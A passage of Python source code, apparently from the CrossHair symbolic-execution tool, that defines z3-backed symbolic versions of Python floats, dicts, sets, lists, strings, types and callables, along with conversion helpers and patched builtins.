_Z3_ONE_HALF)\n return SmtInt(self.statespace, int, z3.If(var != floor + _Z3_ONE_HALF, nearest, z3.If(floor % 2 == 0, floor, floor + 1)))\n\n def __floor__(self):\n return SmtInt(self.statespace, int, z3.ToInt(self.var))\n\n def __ceil__(self):\n var, floor = self.var, z3.ToInt(self.var)\n return SmtInt(self.statespace, int, z3.If(var == floor, floor, floor + 1))\n\n def __mod__(self, other):\n return realize(self) % realize(other) # TODO: z3 does not support modulo on reals\n\n def __trunc__(self):\n var, floor = self.var, z3.ToInt(self.var)\n return SmtInt(self.statespace, int, z3.If(var >= 0, floor, floor + 1))\n\n def __truediv__(self, other):\n if other == 0:\n raise ZeroDivisionError('division by zero')\n return self._numeric_binary_op(other, operator.truediv)\n\n\n_CONVERSION_METHODS: Dict[Tuple[type, type], Any] = {\n (bool, int): int,\n (bool, float): float,\n (bool, complex): complex,\n (SmtBool, int): lambda i: SmtInt(i.statespace, int, smt_bool_to_int(i.var)),\n (SmtBool, float): lambda i: SmtFloat(i.statespace, float, smt_bool_to_float(i.var)),\n (SmtBool, complex): complex,\n \n (int, float): float,\n (int, complex): complex,\n (SmtInt, float): lambda i: SmtFloat(i.statespace, float, smt_int_to_float(i.var)),\n (SmtInt, complex): complex,\n \n (float, complex): complex,\n (SmtFloat, complex): complex,\n}\n\ndef convert(val: object, target_type: type) -> object:\n '''\n Attempt to convert to the given type, as Python would perform\n implicit conversion. 
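Returns the value unchanged when no implicit conversion applies. 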
Handles both crosshair and native values.\n '''\n orig_type = type(val)\n converter = _CONVERSION_METHODS.get((orig_type, target_type))\n if converter:\n return converter(val)\n return val\n\ndef convert_to_common_type(val1: object, val2: object) -> Tuple[object, object]:\n return (convert(val1, python_type(val2)),\n convert(val2, python_type(val1)))\n\nclass SmtDictOrSet(SmtBackedValue):\n '''\n TODO: Ordering is a challenging issue here.\n Modern pythons have in-order iteration for dictionaries but not sets.\n '''\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n self.key_pytype = normalize_pytype(type_arg_of(typ, 0))\n self.smt_key_sort = type_to_smt_sort(self.key_pytype)\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n self.key_ch_type = crosshair_type_for_python_type(self.key_pytype)\n self.statespace.add(self._len() >= 0)\n\n def _arr(self):\n return self.var[0]\n\n def _len(self):\n return self.var[1]\n\n def __len__(self):\n return SmtInt(self.statespace, int, self._len())\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self._len() != 0).__bool__()\n\n\nclass SmtDict(SmtDictOrSet, collections.abc.MutableMapping):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n self.val_pytype = normalize_pytype(type_arg_of(typ, 1))\n self.smt_val_sort = type_to_smt_sort(self.val_pytype)\n SmtDictOrSet.__init__(self, statespace, typ, smtvar)\n self.val_ch_type = crosshair_type_for_python_type(self.val_pytype)\n arr_var = self._arr()\n len_var = self._len()\n self.val_missing_checker = arr_var.sort().range().recognizer(0)\n self.val_missing_constructor = arr_var.sort().range().constructor(0)\n self.val_constructor = arr_var.sort().range().constructor(1)\n self.val_accessor = arr_var.sort().range().accessor(1, 0)\n self.empty = z3.K(arr_var.sort().domain(),\n self.val_missing_constructor())\n self.statespace.add((arr_var == self.empty) == (len_var == 0))\n\n def __init_var__(self, typ, varname):\n assert typ == self.python_type\n arr_smt_sort = z3.ArraySort(\n self.smt_key_sort, possibly_missing_sort(self.smt_val_sort))\n return (\n z3.Const(varname + '_map' + self.statespace.uniq(), arr_smt_sort),\n z3.Const(varname + '_len' + self.statespace.uniq(), z3.IntSort())\n )\n\n def __eq__(self, other):\n (self_arr, self_len) = self.var\n has_heapref = smt_sort_has_heapref(\n self.var[1].sort()) or smt_sort_has_heapref(self.var[0].sort())\n if not has_heapref:\n if isinstance(other, SmtDict):\n (other_arr, other_len) = other.var\n return SmtBool(self.statespace, bool, z3.And(self_len == other_len, self_arr == other_arr))\n # Manually check equality. Drive the loop from the (likely) concrete value 'other':\n if not isinstance(other, collections.abc.Mapping):\n return False\n if len(self) != len(other):\n return False\n for k, v in other.items():\n if k not in self or self[k] != v:\n return False\n return True\n\n def __repr__(self):\n return str(dict(self.items()))\n\n def __setitem__(self, k, v):\n missing = self.val_missing_constructor()\n k = coerce_to_smt_sort(self.statespace, k, self.smt_key_sort)\n v = coerce_to_smt_sort(self.statespace, v, self.smt_val_sort)\n if k is None or v is None:\n # TODO: dictionaries can become more loosely typed as items are\n # assigned. 
Dictionary is invariant, though, so perhaps such cases\n # should have been already caught by the type checker.\n raise CrosshairUnsupported('dictionary assignment with conflicting types')\n old_arr, old_len = self.var\n new_len = z3.If(z3.Select(old_arr, k) == missing, old_len + 1, old_len)\n self.var = (z3.Store(old_arr, k, self.val_constructor(v)), new_len)\n\n def __delitem__(self, k):\n missing = self.val_missing_constructor()\n k = force_to_smt_sort(self.statespace, k, self.smt_key_sort)\n old_arr, old_len = self.var\n if SmtBool(self.statespace, bool, z3.Select(old_arr, k) == missing).__bool__():\n raise KeyError(k)\n if SmtBool(self.statespace, bool, self._len() == 0).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n self.var = (z3.Store(old_arr, k, missing), old_len - 1)\n\n def __getitem__(self, k):\n with self.statespace.framework():\n smt_key = coerce_to_smt_sort(self.statespace, k, self.smt_key_sort)\n if smt_key is None:\n # A key of the wrong type cannot be present.\n # Try to raise the right exception:\n if getattr(k, '__hash__', None) is None:\n raise TypeError(\"unhashable type\")\n else:\n raise KeyError(k)\n possibly_missing = self._arr()[smt_key]\n is_missing = self.val_missing_checker(possibly_missing)\n if SmtBool(self.statespace, bool, is_missing).__bool__():\n raise KeyError(k)\n if SmtBool(self.statespace, bool, self._len() == 0).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n return smt_to_ch_value(self.statespace,\n self.snapshot,\n self.val_accessor(possibly_missing),\n self.val_pytype)\n\n def __iter__(self):\n # TODO: dictionaries now have constant ordering.\n # TODO: partial iteration can produce impossible results.\n arr_var, len_var = self.var\n idx = 0\n arr_sort = self._arr().sort()\n missing = self.val_missing_constructor()\n while SmtBool(self.statespace, bool, idx < len_var).__bool__():\n if SmtBool(self.statespace, bool, arr_var == self.empty).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n k = z3.Const('k' + str(idx) + self.statespace.uniq(),\n arr_sort.domain())\n v = z3.Const('v' + str(idx) + self.statespace.uniq(),\n self.val_constructor.domain(0))\n remaining = z3.Const('remaining' + str(idx) +\n self.statespace.uniq(), arr_sort)\n idx += 1\n self.statespace.add(arr_var == z3.Store(\n remaining, k, self.val_constructor(v)))\n self.statespace.add(z3.Select(remaining, k) == missing)\n yield smt_to_ch_value(self.statespace,\n self.snapshot,\n k,\n self.key_pytype)\n arr_var = remaining\n # In this conditional, we reconcile the parallel symbolic variables for length\n # and contents:\n if SmtBool(self.statespace, bool, arr_var != self.empty).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n\n def copy(self):\n return SmtDict(self.statespace, self.python_type, self.var)\n\n # TODO: investigate this approach for type masquerading:\n # @property\n # def __class__(self):\n # return dict\n\n\nclass SmtSet(SmtDictOrSet, collections.abc.Set):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n SmtDictOrSet.__init__(self, statespace, typ, smtvar)\n self.empty = z3.K(self._arr().sort().domain(), False)\n self.statespace.add((self._arr() == self.empty) == (self._len() == 0))\n\n def __eq__(self, other):\n (self_arr, self_len) = self.var\n if isinstance(other, SmtSet):\n (other_arr, other_len) = other.var\n if other_arr.sort() == self_arr.sort():\n return SmtBool(self.statespace, bool, z3.And(self_len == other_len, self_arr == other_arr))\n if not 
isinstance(other, (set, frozenset, SmtSet)):\n return False\n # Manually check equality. Drive size from the (likely) concrete value 'other':\n if len(self) != len(other):\n return False\n # Then iterate on self (iteration will create a lot of good symbolic constraints):\n for item in self:\n # We iterate over other instead of just checking \"if item in other:\" because we\n # don't want to hash our symbolic item, which would materialize it.\n found = False\n for oitem in other:\n if item == oitem:\n found = True\n break\n if not found:\n return False\n return True\n\n def __init_var__(self, typ, varname):\n assert typ == self.python_type\n return (\n z3.Const(varname + '_map' + self.statespace.uniq(),\n z3.ArraySort(type_to_smt_sort(self.key_pytype),\n z3.BoolSort())),\n z3.Const(varname + '_len' + self.statespace.uniq(), z3.IntSort())\n )\n\n def __contains__(self, raw_key):\n converted_key = convert(raw_key, self.key_pytype) # handle implicit numeric conversions\n k = coerce_to_smt_sort(self.statespace, converted_key, self._arr().sort().domain())\n if k is not None:\n present = self._arr()[k]\n return SmtBool(self.statespace, bool, present)\n # Fall back to standard equality and iteration\n for self_item in self:\n if self_item == raw_key:\n return True\n return False\n\n def __iter__(self):\n arr_var, len_var = self.var\n idx = 0\n arr_sort = self._arr().sort()\n keys_on_heap = smt_sort_has_heapref(arr_sort.domain())\n already_yielded = []\n while SmtBool(self.statespace, bool, idx < len_var).__bool__():\n if SmtBool(self.statespace, bool, arr_var == self.empty).__bool__():\n raise IgnoreAttempt('SmtSet in inconsistent state')\n k = z3.Const('k' + str(idx) + self.statespace.uniq(),\n arr_sort.domain())\n remaining = z3.Const('remaining' + str(idx) +\n self.statespace.uniq(), arr_sort)\n idx += 1\n self.statespace.add(arr_var == z3.Store(remaining, k, True))\n self.statespace.add(z3.Not(z3.Select(remaining, k)))\n ch_value = smt_to_ch_value(self.statespace, self.snapshot, k, self.key_pytype)\n if keys_on_heap:\n # need to confirm that we do not yield two keys that are __eq__\n for previous_value in already_yielded:\n if ch_value == previous_value:\n raise IgnoreAttempt('Duplicate items in set')\n already_yielded.append(ch_value)\n yield ch_value\n arr_var = remaining\n # In this conditional, we reconcile the parallel symbolic variables for length\n # and contents:\n if SmtBool(self.statespace, bool, arr_var != self.empty).__bool__():\n raise IgnoreAttempt('SmtSet in inconsistent state')\n debug('Set size determined to be ', idx)\n\n def _set_op(self, attr, other):\n # We need to check the type of other here, because builtin sets\n # do not accept iterable args (but the abc Set does)\n if isinstance(other, collections.abc.Set):\n return getattr(collections.abc.Set, attr)(self, other)\n else:\n raise TypeError\n\n # Hardwire some operations into abc methods\n # (SmtBackedValue defaults these operations into\n # TypeErrors, but must appear first in the mro)\n def __ge__(self, other):\n return self._set_op('__ge__', other)\n\n def __gt__(self, other):\n return self._set_op('__gt__', other)\n\n def __le__(self, other):\n return self._set_op('__le__', other)\n\n def __lt__(self, other):\n return self._set_op('__lt__', other)\n\n def __and__(self, other):\n return self._set_op('__and__', other)\n __rand__ = __and__\n\n def __or__(self, other):\n return self._set_op('__or__', other)\n __ror__ = __or__\n\n def __xor__(self, other):\n return self._set_op('__xor__', other)\n __rxor__ = __xor__\n\n 
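# Like the operators above, difference delegates to the abc Set implementation:\n 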
def __sub__(self, other):\n return self._set_op('__sub__', other)\n\n\nclass SmtMutableSet(SmtSet):\n def __repr__(self):\n return str(set(self))\n\n @classmethod\n def _from_iterable(cls, it):\n # overrides collections.abc.Set's version\n return set(it)\n\n def add(self, k):\n k = coerce_to_smt_var(self.statespace, k)\n old_arr, old_len = self.var\n new_len = z3.If(z3.Select(old_arr, k), old_len, old_len + 1)\n self.var = (z3.Store(old_arr, k, True), new_len)\n\n def discard(self, k):\n k = coerce_to_smt_var(self.statespace, k)\n old_arr, old_len = self.var\n new_len = z3.If(z3.Select(old_arr, k), old_len - 1, old_len)\n self.var = (z3.Store(old_arr, k, False), new_len)\n\n\nclass SmtFrozenSet(SmtSet):\n def __repr__(self):\n return frozenset(self).__repr__()\n\n def __hash__(self):\n return frozenset(self).__hash__()\n\n @classmethod\n def _from_iterable(cls, it):\n # overrides collections.abc.Set's version\n return frozenset(it)\n\n\ndef process_slice_vs_symbolic_len(\n space: StateSpace,\n i: slice,\n smt_len: z3.ExprRef\n) -> Union[z3.ExprRef, Tuple[z3.ExprRef, z3.ExprRef]]:\n def normalize_symbolic_index(idx):\n if isinstance(idx, int):\n return idx if idx >= 0 else smt_len + idx\n else:\n idx = force_to_smt_sort(space, idx, z3.IntSort())\n return z3.If(idx >= 0, idx, smt_len + idx)\n if isinstance(i, int) or isinstance(i, SmtInt):\n smt_i = smt_coerce(i)\n if space.smt_fork(z3.Or(smt_i >= smt_len, smt_i < -smt_len)):\n raise IndexError(f'index \"{i}\" is out of range')\n smt_i = normalize_symbolic_index(smt_i)\n return force_to_smt_sort(space, smt_i, z3.IntSort())\n elif isinstance(i, slice):\n smt_start, smt_stop, smt_step = (i.start, i.stop, i.step)\n if smt_step not in (None, 1):\n raise CrosshairUnsupported('slice steps not handled')\n start = normalize_symbolic_index(\n smt_start) if i.start is not None else 0\n stop = normalize_symbolic_index(\n smt_stop) if i.stop is not None else smt_len\n return (force_to_smt_sort(space, start, z3.IntSort()),\n force_to_smt_sort(space, stop, z3.IntSort()))\n else:\n raise TypeError(\n 'indices must be integers or slices, not ' + str(type(i)))\n\n\nclass SmtSequence(SmtBackedValue):\n def __iter__(self):\n idx = 0\n while len(self) > idx:\n yield self[idx]\n idx += 1\n\n def __len__(self):\n return SmtInt(self.statespace, int, z3.Length(self.var))\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, z3.Length(self.var) > 0).__bool__()\n\n def __mul__(self, other):\n if not isinstance(other, int):\n raise TypeError(\"can't multiply by non-int\")\n if other <= 0:\n return self[0:0]\n ret = self\n for idx in range(1, other):\n ret = self.__add__(ret)\n return ret\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n\nclass SmtArrayBasedUniformTuple(SmtSequence):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: Union[str, Tuple]):\n if type(smtvar) == str:\n pass\n else:\n assert type(smtvar) is tuple, f'incorrect type {type(smtvar)}'\n assert len(smtvar) == 2\n self.val_pytype = normalize_pytype(type_arg_of(typ, 0))\n self.item_smt_sort = (HeapRef if pytype_uses_heap(self.val_pytype)\n else type_to_smt_sort(self.val_pytype))\n self.key_pytype = int\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n arr_var = self._arr()\n len_var = self._len()\n self.statespace.add(len_var >= 0)\n \n self.val_ch_type = crosshair_type_for_python_type(self.val_pytype)\n \n\n def __init_var__(self, typ, varname):\n assert typ == self.python_type\n arr_smt_type = z3.ArraySort(z3.IntSort(), self.item_smt_sort)\n return (\n 
z3.Const(varname + '_map' + self.statespace.uniq(), arr_smt_type),\n z3.Const(varname + '_len' + self.statespace.uniq(), z3.IntSort())\n )\n\n def _arr(self):\n return self.var[0]\n\n def _len(self):\n return self.var[1]\n\n def __len__(self):\n return SmtInt(self.statespace, int, self._len())\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self._len() != 0).__bool__()\n \n def __eq__(self, other):\n (self_arr, self_len) = self.var\n if not is_iterable(other):\n return False\n if len(self) != len(other):\n return False\n for idx, v in enumerate(other):\n if self[idx] != v:\n return False\n return True\n\n def __repr__(self):\n return str(list(self))\n\n def __setitem__(self, k, v):\n raise CrosshairInternal()\n\n def __delitem__(self, k):\n raise CrosshairInternal()\n\n def __iter__(self):\n arr_var, len_var = self.var\n idx = 0\n while SmtBool(self.statespace, bool, idx < len_var).__bool__():\n yield smt_to_ch_value(self.statespace,\n self.snapshot,\n z3.Select(arr_var, idx),\n self.val_pytype)\n idx += 1\n\n def __add__(self, other):\n return SequenceConcatenation(self, other)\n\n def __radd__(self, other):\n return SequenceConcatenation(other, self)\n\n def __contains__(self, other):\n space = self.statespace\n with space.framework():\n if not smt_sort_has_heapref(self.item_smt_sort):\n smt_other = coerce_to_smt_sort(space, other, self.item_smt_sort)\n if smt_other is not None:\n # OK to perform a symbolic comparison\n idx = z3.Const('possible_idx' + space.uniq(), z3.IntSort())\n idx_in_range = z3.Exists(idx, z3.And(0 <= idx,\n idx < self._len(),\n z3.Select(self._arr(), idx) == smt_other))\n return SmtBool(space, bool, idx_in_range)\n # Fall back to standard equality and iteration\n for self_item in self:\n if self_item == other:\n return True\n return False\n\n def __getitem__(self, i):\n space = self.statespace\n with space.framework():\n if i == slice(None, None, None):\n return self\n idx_or_pair = process_slice_vs_symbolic_len(space, i, self._len())\n if isinstance(idx_or_pair, tuple):\n (start, stop) = idx_or_pair\n (myarr, mylen) = self.var\n start = SmtInt(space, int, start)\n stop = SmtInt(space, int, smt_min(mylen, smt_coerce(stop)))\n return SliceView(self, start, stop)\n else:\n smt_result = z3.Select(self._arr(), idx_or_pair)\n return smt_to_ch_value(space, self.snapshot, smt_result, self.val_pytype)\n\n def insert(self, idx, obj):\n raise CrosshairUnsupported\n\n\nclass SmtList(ShellMutableSequence, collections.abc.MutableSequence, CrossHairValue):\n def __init__(self, *a):\n ShellMutableSequence.__init__(self, SmtArrayBasedUniformTuple(*a))\n def __ch_pytype__(self):\n return python_type(self.inner)\n def __ch_realize__(self):\n return list(self)\n def _is_subclass_of_(cls, other):\n return other is list\n def __mod__(self, *a):\n raise TypeError\n def index(self, value: object, start: int = 0, stop: int = 9223372036854775807) -> int:\n '''\n Return first index of value.\n Raises ValueError if the value is not present.\n '''\n for i in range(start, min(self.__len__(), stop)):\n cur = self[i]\n if cur == value:\n return i\n raise ValueError(f'{value} is not in list')\n\n\nclass SmtType(SmtBackedValue):\n _realization : Optional[Type] = None\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert origin_of(typ) is type\n self.pytype_cap = origin_of(typ.__args__[0]) if hasattr(typ, '__args__') else object\n assert type(self.pytype_cap) is type\n smt_cap = statespace.type_repo.get_type(self.pytype_cap)\n 
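# Store the symbolic var, then constrain it to subclass the declared cap.\n 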
SmtBackedValue.__init__(self, statespace, typ, smtvar)\n statespace.add(statespace.type_repo.smt_issubclass(self.var, smt_cap))\n def _is_superclass_of_(self, other):\n if self is SmtType:\n return False\n if type(other) is SmtType:\n # Prefer it this way because only _is_subclass_of_ does the type cap lowering.\n return other._is_subclass_of_(self)\n space = self.statespace\n with space.framework():\n coerced = coerce_to_smt_sort(space, other, self.var.sort())\n if coerced is None:\n return False\n return SmtBool(space, bool, space.type_repo.smt_issubclass(coerced, self.var))\n def _is_subclass_of_(self, other):\n if self is SmtType:\n return False\n space = self.statespace\n with space.framework():\n coerced = coerce_to_smt_sort(space, other, self.var.sort())\n if coerced is None:\n return False\n ret = SmtBool(space, bool, space.type_repo.smt_issubclass(self.var, coerced))\n other_pytype = other.pytype_cap if type(other) is SmtType else other\n # consider lowering the type cap\n if other_pytype is not self.pytype_cap and issubclass(other_pytype, self.pytype_cap) and ret:\n self.pytype_cap = other_pytype\n return ret\n def __ch_realize__(self):\n return self._realized()\n def _realized(self):\n if self._realization is None:\n self._realization = self._realize()\n return self._realization\n def _realize(self) -> Type:\n cap = self.pytype_cap\n space = self.statespace\n if cap is object:\n pytype_to_smt = space.type_repo.pytype_to_smt\n for pytype, smt_type in pytype_to_smt.items():\n if not issubclass(pytype, cap):\n continue\n if space.smt_fork(self.var != smt_type):\n continue\n return pytype\n raise IgnoreAttempt\n else:\n subtype = choose_type(space, cap)\n smt_type = space.type_repo.get_type(subtype)\n if space.smt_fork(self.var != smt_type):\n raise IgnoreAttempt\n return subtype\n def __copy__(self):\n return self if self._realization is None else self._realization\n def __repr__(self):\n return repr(self._realized())\n def __hash__(self):\n return hash(self._realized())\n\n\nclass LazyObject(ObjectProxy):\n _inner: object = _MISSING\n\n def _realize(self):\n raise NotImplementedError\n\n def _wrapped(self):\n inner = object.__getattribute__(self, '_inner')\n if inner is _MISSING:\n inner = self._realize()\n object.__setattr__(self, '_inner', inner)\n return inner\n\n def __deepcopy__(self, memo):\n inner = object.__getattribute__(self, '_inner')\n if inner is _MISSING:\n # CrossHair will deepcopy for mutation checking.\n # That's usually bad for LazyObjects, which want to defer their\n # realization, so we simply don't do mutation checking for these\n # kinds of values right now.\n return self\n else:\n return copy.deepcopy(self._wrapped())\n\n\nclass SmtObject(LazyObject, CrossHairValue):\n '''\n An object with an unknown type.\n We lazily create a more specific smt-based value in hopes that an\n isinstance() check will be called before something is accessed on us.\n Note that this class is not an SmtBackedValue, but its _typ and _inner\n members can be.\n '''\n def __init__(self, space: StateSpace, typ: Type, varname: object):\n object.__setattr__(self, '_typ', SmtType(space, type, varname))\n object.__setattr__(self, '_space', space)\n object.__setattr__(self, '_varname', varname)\n\n def _realize(self):\n space = object.__getattribute__(self, '_space')\n varname = object.__getattribute__(self, '_varname')\n\n typ = object.__getattribute__(self, '_typ')\n pytype = realize(typ)\n debug('materializing symbolic object as an instance of', pytype)\n if pytype is object:\n return 
object()\n return proxy_for_type(pytype, space, varname, allow_subtypes=False)\n\n @property\n def python_type(self):\n return object.__getattribute__(self, '_typ')\n\n @property\n def __class__(self):\n return SmtObject\n\n @__class__.setter\n def __class__(self, value):\n raise CrosshairUnsupported\n\n\nclass SmtCallable(SmtBackedValue):\n __closure__ = None\n\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n\n def __eq__(self, other):\n return (self.var is other.var) if isinstance(other, SmtCallable) else False\n\n def __hash__(self):\n return id(self.var)\n\n def __init_var__(self, typ, varname):\n type_args = type_args_of(self.python_type)\n if not type_args:\n type_args = [..., Any]\n (self.arg_pytypes, self.ret_pytype) = type_args\n if self.arg_pytypes == ...:\n raise CrosshairUnsupported\n self.arg_ch_type = map(\n crosshair_type_for_python_type, self.arg_pytypes)\n self.ret_ch_type = crosshair_type_for_python_type(self.ret_pytype)\n all_pytypes = tuple(self.arg_pytypes) + (self.ret_pytype,)\n return z3.Function(varname + self.statespace.uniq(),\n *map(type_to_smt_sort, self.arg_pytypes),\n type_to_smt_sort(self.ret_pytype))\n\n def __ch_realize__(self):\n return self # we don't realize callables right now\n\n def __call__(self, *args):\n if len(args) != len(self.arg_pytypes):\n raise TypeError('wrong number of arguments')\n args = (coerce_to_smt_var(self.statespace, a) for a in args)\n smt_ret = self.var(*args)\n # TODO: detect that `smt_ret` might be a HeapRef here\n return self.ret_ch_type(self.statespace, self.ret_pytype, smt_ret)\n\n def __repr__(self):\n finterp = self.statespace.find_model_value_for_function(self.var)\n if finterp is None:\n # (z3 model completion will not interpret a function for me currently)\n return ''\n # 0-arg interpretations seem to be simply values:\n if type(finterp) is not z3.FuncInterp:\n return 'lambda :' + repr(model_value_to_python(finterp))\n if finterp.arity() < 10:\n arg_names = [chr(ord('a') + i) for i in range(finterp.arity())]\n else:\n arg_names = ['a' + str(i + 1) for i in range(finterp.arity())]\n entries = finterp.as_list()\n body = repr(model_value_to_python(entries[-1]))\n for entry in reversed(entries[:-1]):\n conditions = ['{} == {}'.format(arg, repr(model_value_to_python(val)))\n for (arg, val) in zip(arg_names, entry[:-1])]\n body = '{} if ({}) else ({})'.format(repr(model_value_to_python(entry[-1])),\n ' and '.join(conditions),\n body)\n return 'lambda ({}): {}'.format(', '.join(arg_names), body)\n\n\nclass SmtUniformTuple(SmtArrayBasedUniformTuple, collections.abc.Sequence, collections.abc.Hashable):\n def __repr__(self):\n return tuple(self).__repr__()\n\n def __hash__(self):\n return tuple(self).__hash__()\n\n\nclass SmtStr(SmtSequence, AbcString):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert typ == str\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n self.item_pytype = str\n self.item_ch_type = SmtStr\n\n def __str__(self):\n return self.statespace.find_model_value(self.var)\n\n def __copy__(self):\n return SmtStr(self.statespace, str, self.var)\n\n def __repr__(self):\n return repr(self.__str__())\n\n def __hash__(self):\n return hash(self.__str__())\n\n def __add__(self, other):\n return self._binary_op(other, operator.add)\n\n def __radd__(self, other):\n return self._binary_op(other, lambda a, b: b + a)\n\n def __mul__(self, other):\n space = self.statespace\n # If repetition count is a 
literal, use that first:\n if type(other) == int:\n if other <= 1:\n return self if other == 1 else ''\n return SmtStr(space, str, z3.Concat(*[self.var for _ in range(other)]))\n # Else, create a new symbolic string that regex-matches as a repetition.\n # Z3 cannot do much with a symbolic regex, so we'll force ourselves into\n # a concrete string.\n concrete_self = self.__str__()\n count = force_to_smt_sort(space, other, z3.IntSort())\n result = SmtStr(space, str, str(self.var) + '_mul' + space.uniq())\n space.add(z3.InRe(result.var, z3.Star(z3.Re(concrete_self))))\n space.add(z3.Length(result.var) == len(concrete_self) * count)\n return result\n\n def __mod__(self, other):\n return self.__str__() % realize(other)\n\n def _cmp_op(self, other, op):\n forced = force_to_smt_sort(self.statespace, other, self.var.sort())\n return SmtBool(self.statespace, bool, op(self.var, forced))\n\n def __lt__(self, other):\n return self._cmp_op(other, operator.lt)\n\n def __le__(self, other):\n return self._cmp_op(other, operator.le)\n\n def __gt__(self, other):\n return self._cmp_op(other, operator.gt)\n\n def __ge__(self, other):\n return self._cmp_op(other, operator.ge)\n\n def __contains__(self, other):\n forced = force_to_smt_sort(self.statespace, other, self.var.sort())\n return SmtBool(self.statespace, bool, z3.Contains(self.var, forced))\n\n def __getitem__(self, i):\n idx_or_pair = process_slice_vs_symbolic_len(\n self.statespace, i, z3.Length(self.var))\n if isinstance(idx_or_pair, tuple):\n (start, stop) = idx_or_pair\n smt_result = z3.Extract(self.var, start, stop - start)\n else:\n smt_result = z3.Extract(self.var, idx_or_pair, 1)\n return SmtStr(self.statespace, str, smt_result)\n\n def find(self, substr, start=None, end=None):\n if end is None:\n return SmtInt(self.statespace, int,\n z3.IndexOf(self.var, smt_coerce(substr), start or 0))\n else:\n return self.__getitem__(slice(start, end, 1)).index(substr)\n\n\n_CACHED_TYPE_ENUMS: Dict[FrozenSet[type], z3.SortRef] = {}\n\n\n_PYTYPE_TO_WRAPPER_TYPE = {\n type(None): (lambda *a: None),\n bool: SmtBool,\n int: SmtInt,\n float: SmtFloat,\n str: SmtStr,\n list: SmtList,\n dict: SmtDict,\n set: SmtMutableSet,\n frozenset: SmtFrozenSet,\n type: SmtType,\n}\n\n# Type ignore pending https://github.com/python/mypy/issues/6864\n_PYTYPE_TO_WRAPPER_TYPE[collections.abc.Callable] = SmtCallable # type:ignore\n\n_WRAPPER_TYPE_TO_PYTYPE = dict((v, k)\n for (k, v) in _PYTYPE_TO_WRAPPER_TYPE.items())\n\n\n#\n# Proxy making helpers\n#\n\ndef make_union_choice(creator, *pytypes):\n for typ in pytypes[:-1]:\n if creator.space.smt_fork():\n return creator(typ)\n return creator(pytypes[-1])\n\ndef make_optional_smt(smt_type):\n def make(creator, *type_args):\n ret = smt_type(creator.space, creator.pytype, creator.varname)\n if creator.space.fork_parallel(false_probability=0.98):\n ret = realize(ret)\n debug('Prematurely realized', creator.pytype, 'value')\n return ret\n return make\n\ndef make_dictionary(creator, key_type = Any, value_type = Any):\n if smt_sort_has_heapref(type_to_smt_sort(key_type)):\n return SimpleDict(proxy_for_type(List[Tuple[key_type, value_type]], creator.space, # type: ignore\n creator.varname, allow_subtypes=False))\n return SmtDict(creator.space, creator.pytype, creator.varname)\n\ndef make_tuple(creator, *type_args):\n if not type_args:\n type_args = (object, ...) 
# type: ignore\n if len(type_args) == 2 and type_args[1] == ...:\n return SmtUniformTuple(creator.space, creator.pytype, creator.varname)\n else:\n return tuple(proxy_for_type(t, creator.space, creator.varname + '_at_' + str(idx), allow_subtypes=True)\n for (idx, t) in enumerate(type_args))\n\ndef make_raiser(exc, *a) -> Callable:\n def do_raise(*ra, **rkw) -> NoReturn:\n raise exc(*a)\n return do_raise\n\n#\n# Monkey Patches\n#\n\n_T = TypeVar('_T')\n_VT = TypeVar('_VT')\n\nclass _BuiltinsCopy:\n pass\n\n_TRUE_BUILTINS: Any = _BuiltinsCopy()\n_TRUE_BUILTINS.__dict__.update(orig_builtins.__dict__)\n\n\n# CPython's len() forces the return value to be a native integer.\n# Avoid that requirement by making it only call __len__().\ndef _len(l):\n return l.__len__() if hasattr(l, '__len__') else [x for x in l].__len__()\n\n# Avoid calling __len__().__index__() on the input list.\n\n\ndef _sorted(l, **kw):\n ret = list(l.__iter__())\n ret.sort()\n return ret\n\n# Trick the system into believing that symbolic values are\n# native types.\n\ndef _issubclass(subclass, superclasses):\n subclass_is_special = hasattr(subclass, '_is_subclass_of_')\n if not subclass_is_special:\n # We could also check superclass(es) for a special method, but\n # the native function won't return True in those cases anyway.\n try:\n ret = _TRUE_BUILTINS.issubclass(subclass, superclasses)\n if ret:\n return True\n except TypeError:\n pass\n if type(superclasses) is not tuple:\n superclasses = (superclasses,)\n for superclass in superclasses:\n if hasattr(superclass, '_is_superclass_of_'):\n method = superclass._is_superclass_of_\n if method(subclass) if hasattr(method, '__self__') else method(subclass, superclass):\n return True\n if subclass_is_special:\n method = subclass._is_subclass_of_\n if method(superclass) if hasattr(method, '__self__') else method(subclass, superclass):\n return True\n return False\n\ndef _isinstance(obj, types):\n try:\n ret = _TRUE_BUILTINS.isinstance(obj, types)\n if ret:\n return True\n except TypeError:\n pass\n if hasattr(obj, 'python_type'):\n obj_type = obj.python_type\n if hasattr(obj_type, '__origin__'):\n obj_type = obj_type.__origin__\n else:\n obj_type = type(obj)\n return issubclass(obj_type, types)\n\n# # TODO: consider tricking the system into believing that symbolic values are\n# # native types.\n# def patched_type(self, *args):\n# ret = self.originals['type'](*args)\n# if len(args) == 1:\n# ret = _WRAPPER_TYPE_TO_PYTYPE.get(ret, ret)\n# for (original_type, proxied_type) in ProxiedObject.__dict__[\"_class_proxy_cache\"].items():\n# if ret is proxied_type:\n# return original_type\n# return ret\n\n\ndef _implies(condition: bool, consequence: bool) -> bool:\n if condition:\n return consequence\n else:\n return True\n\n\ndef _hash(obj: Hashable) -> int:\n '''\n post[]: -2**63 <= _ < 2**63\n '''\n # Skip the built-in hash if possible, because it requires the output\n # to be a native int:\n if is_hashable(obj):\n # You might think we'd say \"return obj.__hash__()\" here, but we need some\n # special gymnastics to avoid \"metaclass confusion\".\n # See: 